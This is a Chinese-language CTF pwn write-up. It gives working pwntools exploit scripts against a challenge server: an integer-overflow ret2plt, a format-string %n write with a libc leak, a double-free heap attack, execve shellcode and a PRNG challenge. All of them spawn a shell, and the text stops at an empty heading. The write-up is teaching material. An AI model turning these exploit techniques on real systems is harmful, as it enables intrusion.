PWN

flow

这题主要考的是整数溢出：unsigned __int8 n9 的取值范围是 0-255，因此输入长度为 257 的字符串时 n9 会回绕成一个很小的值，从而绕过 if 判断；这里还需要了解 Python 中 ljust 的用法。

Python 的 ljust() 方法返回一个将原字符串左对齐、并用填充字符（默认为空格）补足到指定长度的新字符串。如果指定的长度小于原字符串的长度，则返回原字符串。例如，若代码为

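# Example of str.ljust: pad "aaaa" on the right with '0' up to 50 characters.
# The fill character must have the same type as the string (str here, so "0"
# rather than b'0'); the variable is named `s` so the builtin `str` is not shadowed.
s = "aaaa"
padded = s.ljust(50, "0")  # "aaaa" followed by 46 zeros; unchanged if len(s) >= 50
print(padded)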

那么会打印出 aaaa0000…000（总长 50），因此可以用它来简化 payload 填充的写法。exp 如下：

from pwn import*
# Debug-level logging: every byte sent and received is echoed, useful when a stage fails.
context.log_level='debug'
elf=ELF('./flow')
io=remote('1.95.36.136',2127)

# Answer the two prompts the program shows before the vulnerable input.
io.sendlineafter('name:',b'aaaa')
io.sendlineafter('going?',b'3')

# Fixed addresses from the binary (32-bit target, hence p32 below).
exit=0x0804872c   # NOTE: shadows the builtin exit() for the rest of the script
system=elf.plt['system']
bin_sh=0x0804893d

# First input: filler up to the saved return address, then the exit address; padded
# to 258 bytes so the 8-bit length counter described above wraps and the check passes.
payload=cyclic(0x21+4)+p32(exit)
payload=payload.ljust(258,b'a')

io.sendlineafter("shell:",payload)

# Second input: filler, system@plt, a dummy return address, then the "/bin/sh" string.
exp=cyclic(0x108+4)+p32(system)+p32(0)+p32(bin_sh)
io.sendline(exp)

io.interactive()

format

这题主要考的是格式化字符串漏洞，以及如何利用该漏洞实现任意地址写。

此题的关键在于如何将 n 的值改为 4：由于 printf 存在格式化字符串漏洞，先找到 buf 在栈上的参数偏移（脚本中为 4），再用 %n（即 %4$n）把 n 的值改为 4 即可。

exp:

from pwn import*
io=remote('1.95.36.136',2142)
elf=ELF('./format')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#io=process('./format')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
n_addr=0x0804A06C   # address of the global n that must become 4 (see the note above)

io.sendafter("xiang yao shell?",b'no')

# Format-string write: n_addr (4 bytes) is printed first, so %n stores 4; the "4$"
# selects the argument slot where buf starts (offset found beforehand, per the note).
payload1=p32(n_addr)+b'%4$n'
io.sendlineafter("hello hacker!",payload1)

# Round 1: return into puts@plt with puts@got as its argument to leak a libc address,
# then return to main so the program can be driven a second time.
payload=cyclic(0x18+4)+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload)

# The leaked pointer is expected to end in 0xf7; the last four bytes received are it.
# '\xf7' is a str, which pwntools is expected to encode as the single byte 0xf7
# (b'\xf7' would be unambiguous).
puts=u32(io.recvuntil('\xf7')[-4:])
print(hex(puts))

# libc base from the leak, then the addresses needed for the second round.
libc_addr=puts-libc.sym['puts']
system=libc_addr+libc.sym['system']
bin_sh=libc_addr+next(libc.search('/bin/sh'))

io.sendafter("xiang yao shell?",b'no')

# Same write to n as in round 1.
payload1=p32(n_addr)+b'%4$n'
io.sendlineafter("hello hacker!",payload1)

# Round 2: system("/bin/sh") with main as the dummy return address.
payload=cyclic(0x18+4)+p32(system)+p32(main)+p32(bin_sh)
io.sendline(payload)

io.interactive()

bllhl_double_free

一道堆题目，利用的是 double free。

from pwn import*
# Shared connection used by the menu helpers below.
io=remote('1.95.36.136',2074)

def add_chunk(index,size):
    """Menu option 1: request a chunk of `size` bytes stored in slot `index`."""
    replies = (
        ("choice:", b'1'),
        ("index:", str(index)),
        ("size:", str(size)),
    )
    for prompt, reply in replies:
        io.sendlineafter(prompt, reply)

def delete_chunk(index):
    """Menu option 2: free the chunk stored in slot `index`."""
    replies = (
        ("choice:", b'2'),
        ("index:", str(index)),
    )
    for prompt, reply in replies:
        io.sendlineafter(prompt, reply)

def edit_chunk(index,content):
    """Menu option 3: write `content` into slot `index`, sending its length first."""
    length = str(len(content))
    replies = (
        ("choice:", b'3'),
        ("index:", str(index)),
        ("length:", length),
        ("content:", content),
    )
    for prompt, reply in replies:
        io.sendlineafter(prompt, reply)

# Three same-size chunks; freeing 0, 1, 0 is the double free the program permits.
add_chunk(0,0x68)
add_chunk(1,0x68)
add_chunk(2,0x68)

delete_chunk(0)
delete_chunk(1)
delete_chunk(0)

add_chunk(3,0x68)

# Slot 0 still refers to a freed chunk; its first 8 bytes (presumably the free-list
# link) are overwritten with a target near 0x6020C0. The -4 offset is specific to
# this binary's layout and is not verifiable from the script.
edit_chunk(0,p64(0x6020C0-0x4))

# Allocate until the forged entry is handed out; slot 6 is the one that lands on it.
add_chunk(4,0x68)
add_chunk(5,0x68)
add_chunk(6,0x68)

edit_chunk(6,b'aaaa'+p64(0x208))

# Menu option 5 — presumably the path that reads the flag; not visible here.
io.sendline(b'5')

io.interactive()

bllbl_shellcode4

考察的是shellcode的编写

from pwn import*
io=remote('1.95.36.136',2110)

# Fixed addresses from the binary (64-bit target, hence p64 below); names are the
# author's and describe the gadget at each address.
bss_addr=0x04040C0
readbss=0x40132B
leave_ret=0x401360
sh_addr=0x40203f      # unused below; the same value is written literally in the asm
jmp_rsp_0x15=0x40136A

# Stage 1: 9 bytes of filler, then bss_addr, the readbss gadget and leave;ret —
# presumably a pivot so the next read lands in .bss (not verifiable from here).
payload=cyclic(9)+p64(bss_addr)+p64(readbss)+p64(leave_ret)
io.send(payload)

# Stage 2: the shellcode itself. The asm text is target-specific and must stay
# byte-exact; it is followed by the jmp-rsp gadget so execution enters it.
shellcode=asm(
'''
nop;
nop;
nop;
nop;
mov al,0x3b;
mov esi,ebx;
mov edi,0x40203f;
mov edx,esi;
syscall;
''')

payload=shellcode+p64(jmp_rsp_0x15)
io.send(payload)

io.interactive()

forpwn

一道简单的pwn题目,考的是伪随机数

from pwn import*
io=remote('1.95.36.136',2125)

io.send(b'1')

# Five rounds, each answered with fifty '0' bytes; the note above says the challenge
# is about a predictable (pseudo-random) sequence — the exact mechanism is not
# visible from the script.
for i in range(5):
    io.sendline(b'0'*50)
# Indentation was lost in the paste; io.interactive() is taken to follow the loop,
# as in the other scripts on this page.
io.interactive()

bllhl_pieee